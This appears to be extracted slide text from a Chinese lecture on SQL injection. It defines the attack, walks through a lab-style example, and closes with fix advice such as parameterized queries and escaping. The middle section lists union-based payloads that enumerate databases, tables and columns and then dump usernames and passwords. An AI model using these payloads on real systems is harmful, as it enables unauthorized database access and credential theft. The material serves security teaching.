SQL注入漏洞SoftwareEngineering1、理解SQL注入漏洞的含義2、了解部分SQL漏洞實例3、對SQL漏洞提出修復(fù)建議01目錄SQL注入漏洞的概念02SQL漏洞的具體案例03針對SQL的修復(fù)建議

SQL注入漏洞的概念1SQL的注入攻擊定義SQL注入攻擊：可以從以下2個角度來理解。1.SQL注入攻擊的種類和作用2.SQL的運行

SQL注入攻擊包括通過輸入數(shù)據(jù)從客戶端插入或“注入”SQL查詢到應(yīng)用程序。一個成功的SQL注入攻擊可以從數(shù)據(jù)庫中獲取敏感數(shù)據(jù)、修改數(shù)據(jù)庫數(shù)據(jù)（插入/更新/刪除）、執(zhí)行數(shù)據(jù)庫管理操作（如關(guān)閉數(shù)據(jù)庫管理系統(tǒng)）、恢復(fù)存在于數(shù)據(jù)庫文件系統(tǒng)中的指定文件內(nèi)容，在某些情況下能對操作系統(tǒng)發(fā)布命令。SQL注入攻擊是一種注入攻擊。它將SQL命令注入到數(shù)據(jù)層輸入，從而影響執(zhí)行預(yù)定義的SQL命令。SQL的注入攻擊由于用戶的輸入，也是SQL語句的一部分，所以攻擊者可以利用這部分可以控制的內(nèi)容，注入自己定義的語句，改變SQL語句執(zhí)行邏輯，讓數(shù)據(jù)庫執(zhí)行任意自己需要的指令。通過控制部分SQL語句，攻擊者可以查詢數(shù)據(jù)庫中任何自己需要的數(shù)據(jù)，利用數(shù)據(jù)庫的一些特性，可以直接獲取數(shù)據(jù)庫服務(wù)器的系統(tǒng)權(quán)限。

SQL漏洞實例2SQL漏洞的具體案例字符型（參數(shù)在單引號內(nèi)，直接返回結(jié)果）

SQL漏洞的具體案例步驟1：參數(shù)后面加一個單引號報SQL錯誤

分析：單引號報錯，所以參數(shù)在兩個單引號里面，通過閉合單引號、聯(lián)合查詢直接查詢到數(shù)據(jù)庫數(shù)據(jù)

步驟2：構(gòu)造payload

id=0'unionselectNULL,database(),NULL--+

#查詢當(dāng)前數(shù)據(jù)庫的名稱

#爆庫名

id=0'unionselectnull,group_concat(schema_name),nullfrominformation_schema.schemata--+#爆表名id=0'unionselectnull,group_concat(table_name),nullfrominformation_schema.tableswheretable_schema='security'--+#爆字段名d=0'unionselectnull,group_concat(column_name),nullfrominformation_schema.columnswheretable_schema='security'andtable_name='users'--+#獲取數(shù)據(jù)庫中的數(shù)據(jù)id=0'unionselectnull,group_concat(username,0x3a,password),nullfromsecurity.users--+SQL漏洞的修復(fù)建議3SQL的修復(fù)建議使用參數(shù)化查詢接口或在代碼級對帶入SQL語句中的外部參數(shù)進行轉(zhuǎn)義或過濾第一點對于整數(shù)，判斷變量是否符合[0-9]的值；其他限定值，也可以進行合法性校驗；對于字符串，對SQL語句特殊字符進行轉(zhuǎn)義(單引號轉(zhuǎn)成兩個單引號，雙引號轉(zhuǎn)成兩個雙引號)。第二點修復(fù)建議SQL的修復(fù)建議加強服務(wù)器的安全配置，安全組策略第三點啟用制定IP訪